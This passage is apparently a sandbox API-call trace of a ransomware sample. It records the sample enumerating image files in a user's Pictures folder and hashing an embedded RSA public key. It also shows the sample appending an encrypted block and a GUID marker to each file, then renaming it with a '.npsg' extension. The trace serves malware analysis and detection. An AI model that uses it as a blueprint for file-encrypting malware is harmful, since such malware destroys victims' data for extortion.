KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.433] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.434] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.434] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.434] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.434] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.434] GetLastError () returned 0x0 [0238.434] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.434] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.434] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.434] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.434] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.435] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.436] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12aa6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.436] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.436] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.436] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.436] CloseHandle (hObject=0x644) returned 1 [0238.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b86cd0 [0238.438] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\o1QQvYkI-4KiVQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\o1qqvyki-4kivq.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\o1QQvYkI-4KiVQ.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\o1qqvyki-4kivq.jpg.npsg")) returned 1 [0238.440] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63f63dc0, ftCreationTime.dwHighDateTime=0x1d5b63d, ftLastAccessTime.dwLowDateTime=0x4e930650, ftLastAccessTime.dwHighDateTime=0x1d5bbe9, ftLastWriteTime.dwLowDateTime=0x4e930650, ftLastWriteTime.dwHighDateTime=0x1d5bbe9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PzoYP", cAlternateFileName="")) returned 1 [0238.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0238.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f8b0 [0238.440] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf6e9f0, ftCreationTime.dwHighDateTime=0x1d5bcf7, ftLastAccessTime.dwLowDateTime=0x282d9ee0, ftLastAccessTime.dwHighDateTime=0x1d5c494, ftLastWriteTime.dwLowDateTime=0x282d9ee0, ftLastWriteTime.dwHighDateTime=0x1d5c494, nFileSizeHigh=0x0, nFileSizeLow=0xb06d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r21itMuSoNhVqlqZtv.gif", cAlternateFileName="R21ITM~1.GIF")) returned 1 [0238.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.440] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r21itMuSoNhVqlqZtv.gif") returned=".gif" [0238.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r21itMuSoNhVqlqZtv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\r21itmusonhvqlqztv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.442] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=45165) returned 1 [0238.442] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.445] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb047, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.445] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.447] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xb06d, lpOverlapped=0x0) returned 1 [0238.448] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.448] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.448] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.448] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.449] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.449] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.449] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.449] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.449] GetLastError () returned 0x0 [0238.450] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.450] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.450] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.450] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.450] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.450] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.451] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb06d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.451] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.451] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.451] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.451] CloseHandle (hObject=0x644) returned 1 [0238.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0238.453] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r21itMuSoNhVqlqZtv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\r21itmusonhvqlqztv.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r21itMuSoNhVqlqZtv.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\r21itmusonhvqlqztv.gif.npsg")) returned 1 [0238.455] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33cd5530, ftCreationTime.dwHighDateTime=0x1d5c24e, ftLastAccessTime.dwLowDateTime=0x84309e70, ftLastAccessTime.dwHighDateTime=0x1d5ba4b, ftLastWriteTime.dwLowDateTime=0x84309e70, ftLastWriteTime.dwHighDateTime=0x1d5ba4b, nFileSizeHigh=0x0, nFileSizeLow=0xf1f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r2Fs.png", cAlternateFileName="")) returned 1 [0238.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.455] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r2Fs.png") returned=".png" [0238.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r2Fs.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\r2fs.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.456] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=61940) returned 1 [0238.456] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.459] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf1ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.459] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.464] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf1f4, lpOverlapped=0x0) returned 1 [0238.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.466] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.467] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.467] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.467] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.467] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.467] GetLastError () returned 0x0 [0238.467] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.467] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.467] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.467] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.467] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.468] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.469] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf1f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.469] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.469] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.469] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.469] CloseHandle (hObject=0x644) returned 1 [0238.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b88cd0 [0238.473] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r2Fs.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\r2fs.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\r2Fs.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\r2fs.png.npsg")) returned 1 [0238.475] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4836af0, ftCreationTime.dwHighDateTime=0x1d5c598, ftLastAccessTime.dwLowDateTime=0x6565040, ftLastAccessTime.dwHighDateTime=0x1d5c0f8, ftLastWriteTime.dwLowDateTime=0x6565040, ftLastWriteTime.dwHighDateTime=0x1d5c0f8, nFileSizeHigh=0x0, nFileSizeLow=0xf961, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zjWn8TQ2-F nbNaC.gif", cAlternateFileName="ZJWN8T~1.GIF")) returned 1 [0238.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.475] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zjWn8TQ2-F nbNaC.gif") returned=".gif" [0238.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zjWn8TQ2-F nbNaC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\zjwn8tq2-f nbnac.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.476] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=63841) returned 1 [0238.476] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.479] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf93b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.479] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.481] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf961, lpOverlapped=0x0) returned 1 [0238.482] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.482] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.482] lstrlenA (lpString="-----BEGIN PUBLIC 